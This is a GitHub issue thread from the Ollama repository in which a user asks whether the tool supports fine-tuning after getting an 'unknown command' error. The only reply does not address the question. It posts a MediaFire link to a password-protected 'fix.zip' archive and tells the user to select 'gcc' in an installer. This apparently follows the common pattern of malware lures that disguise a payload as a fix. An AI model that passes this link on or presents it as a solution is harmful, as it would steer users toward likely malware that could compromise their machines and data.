### ISSUE TITLE
Is Fine-Tuning Supported in Ollama?

### ISSUE THREAD

**Issue by parthipan76** [ollama/ollama#6517]
### What is the issue?

Hi everyone,

I’ve been exploring Ollama for working with LLaMA models, and I came across an issue where the fine-tune command seems to be unrecognized. Specifically, when I try to fine-tune a model using the command:

ollama fine-tune llama3.1:8b -f training_data.jsonl
I receive an error: unknown command "fine-tune" for "ollama".

Is fine-tuning supported in Ollama? If not, are there any plans to add this feature, or are there alternative methods to fine-tune models within Ollama?

Thanks in advance!

### OS

Linux

### CPU

Intel

### Ollama version

0.3.6

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
